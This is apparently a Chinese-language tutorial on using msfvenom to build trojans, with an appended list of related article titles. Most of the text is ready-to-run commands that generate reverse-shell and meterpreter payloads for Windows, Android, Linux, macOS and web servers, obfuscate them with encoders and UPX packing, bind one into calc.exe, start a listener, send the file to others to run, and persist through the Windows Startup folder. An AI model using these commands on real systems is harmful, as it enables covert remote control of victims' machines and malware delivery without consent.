简介

msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。

参数

–p (- -payload-options):添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT,就可以生成对应语言,对应平台的后门。

· –l:查看所有payload encoder nops。

· –f :输出文件格式。

· –e:编码免杀。

· –a:选择架构平台  x86 | x64 | x86_64

· –o:文件输出

· –s:生成payload的最大长度,就是文件大小。

· –b:避免使用的字符 例如:不使用 ‘\0f’。

· –i:编码次数。

· –c:添加自己的shellcode

· –x | -k:捆绑

生成exe木马

#lhost是我们的主机ip,lport是我们主机的用于监听的端口

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.129 lport=8888 -f exe -o test.exe

#编码3次

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.129 lport=8888 -i 3 -e x86/shikata_ga_nai  -f exe -o test.exe

#编码10次、捆绑正常的32位calc.exe,生成32位的test.exe文件

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 10 lhost=192.168.31.129 lport=8888 -x calc.exe -f exe -o test.exe

利用 upx 加壳

upx的功能有两种描述。一种叫做给程序加壳,另一种叫压缩程序。其实这两种表述都是正确的,只是从不同的角度对upx的描述。upx的工作原理其实是这样的:首先将程序压缩。所谓的压缩包括两方面,一方面在程序的开头或者其他合适的地方插入一段代码,另一方面是将程序的其他地方做压缩。压缩也可以叫做加密,因为压缩后的程序比较难看懂,主要是和原来的代码有很大的不同。最大的表现也就是他的主要作用就是程序本身变小了。变小之后的程序在传输方面有很大的优势。其次就是在程序执行时,实时的对程序解压缩。解压缩功能是在第一步时插入的代码完成的功能。联起来 就是:upx可以完成代码的压缩和实时解压执行。且不会影响程序的执行效率。upx和普通的压缩,解压不同点就算在于upx是实时解压缩的。

upx -9 test.exe -k -o test1.exe

生成其他格式木马:

安卓app:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888 -o ~/Desktop/test2.apk

Linux:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888 -f  elf > shell.elf

Mac:

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.31.129 LPORT=8888 -f macho >  shell.macho

PHP:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.27 LPORT=4444 -f raw -o test.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888  -f asp > shell.asp

ASPX:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888  -f  aspx > shell.aspx

JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.31.129 LPORT=8888 -f  raw > shell.jsp

Bash:

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.31.129 LPORT=8888 -f   raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.31.129 LPORT=8888 -f raw > shell.pl

Python

msfvenom -p python/meterpreter/reverser_tcp LHOST=192.168.31.129 LPORT=8888 -f   raw > shell.py

#使用exploit/multi/handler监听从肉鸡发来的数据

msf > use exploit/multi/handler

#设置payload,不同的木马设置不同的payload

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

#主机ip

msf exploit(handler) > set lhost 192.168.31.129

#主机端口

msf exploit(handler) > set lport 8888

msf exploit(handler) > exploit

然后利用任何一种方式发送给其他人,让其在其他主机上运行,这边就会接收到反弹过来的session。

输入:sessions  -l  可以查看到得到的shell,使用 sessions -i  1 可以进入指定的shell

对于这个木马,如果在获取到某主机的shell后,想要在目标主机建立持续性的后门,可以将该木马放到目标主机的开机启动项中,只要该主机启动后,就可以连接到该主机了。

C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

msfvenom生成muma相关推荐

  1. msfvenom生成木马和内网穿透

    msfvenom命令行选项如下: 英文原版 中文版: Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的pay ...

  2. msfvenom生成木马的简单利用

    msfvenom生成木马的简单利用 1.简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10. 2.实 ...

  3. 利用msfvenom生成后门木马

    msfvenom工具介绍 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload an ...

  4. msfvenom生成木马利用

    一开始想着把自己的物理主机当作靶机来执行木马,奈何发现不能从kali拖拽文件,所以先处理了下Tools的问题. 在安装Tools的时候提示CD-ROM门锁定,如果有和我一样问题的朋友可以按照我的方法来 ...

  5. msfvenom生成木马攻击-Windows10实现自己黑自己

    简介: 昨天看赛题的时候,发现了一个生成"木马",学一下,来做个笔记. 没有想到msf竟然有一个,可以生成木马的工具,msfvenom. 本文用 # 作为注释. 测试环境: 攻击机 ...

  6. 使用msfvenom生成木马用于监听别人的操作

    ss msfvenom Options: -p, --payload < payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的payload,请使用& ...

  7. msfvenom生成远控木马

    1.生成病毒 在终端输入msfvenom -p windows/x64/meterpreter/reverse_tcp lhost =192.168.116.132 lport =12345 -f e ...

  8. 渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)

    MsfVenom 首先msf就是Metaaploit,venom就是病毒.msfvenom是msfpayload和msfencode的组合.将这两个工具集成在一个框架实例中.进一步来说,msfveno ...

  9. 利用msfvenom生成木马文件反弹shell

    目录 1.安装靶机和攻击机 2.利用生成木马文件 3.msf里面开启监听 4.攻击成功且利用 5.meterpreter简单系统命令 1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSD ...

  10. 【木马生成工具】Msfvenom介绍及利用

    Msfvenom介绍及利用 简介 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayloa ...

最新文章

  1. Kubernetes的HTTPS和证书问题,汇总
  2. 本地Git连接服务器git不用每次输入用户名和密码的方法
  3. smartform四联纸跳页问题
  4. 计算机网络第三章-数据链路层
  5. Oracle内存结构详解(三)--管理Oracle Share Pool
  6. P6800-[模板]Chirp Z-Transform【NTT】
  7. docker run命令_CVE-2019-14271:Docker cp命令漏洞分析
  8. 数据库的恢复 mysql
  9. 我的第一个项目----Java图书管理系统
  10. 警惕 | 警惕,mybatis的size()方法竟然有坑!
  11. 计算机应用无法打开,双击磁盘无法打开?_计算机应用_邹志强个人网站—(www.zouzhiqiang.com)...
  12. Huffuman树(java)
  13. java sublist_java中的subList
  14. Atitit 四种自动机 fsm pda 目录 1. 自动机可分为有限自动机、后进先出自动机、线性有界自动机、图灵机等几种。它们对语言的识别能力各不相同。 2 1.1. 抽象自动机的理论。 2 1.
  15. filp/whoops
  16. html实现安卓手机重启,这12行代码分分钟让你电脑崩溃手机重启
  17. Word2Vec之Skip-Gram与CBOW模型
  18. nbu6.5 linux安装,Veritas.Netbackup 6.0 for Linux RedHat AS5.3安装问题
  19. 夕阳无限好 只是近黄昏
  20. R语言-多元统计学分析课程报告

热门文章

  1. JS中的window对象和document对象是什么?有什么区别?
  2. Cassandra启动过程详解【原创】
  3. 故障分析 | OceanBase Proxy 无法连接 OBserver 集群
  4. 一分钟解决 The server selected protocol version TLS10 is not accepted 问题
  5. 页面提示以及页面刷新
  6. wps将批量数字转换成条形码_WPS怎么批量制作条码.
  7. Android如何关闭硬件加速
  8. GAMMA初学笔记二
  9. matlab两个力的合成与分解,[转帖]小波图像分解与合成(例子) - Matlab讨论区 - 振动论坛 动力学,噪声 -......
  10. linux系统发送短信,Linux系统的短信收发怎么实现?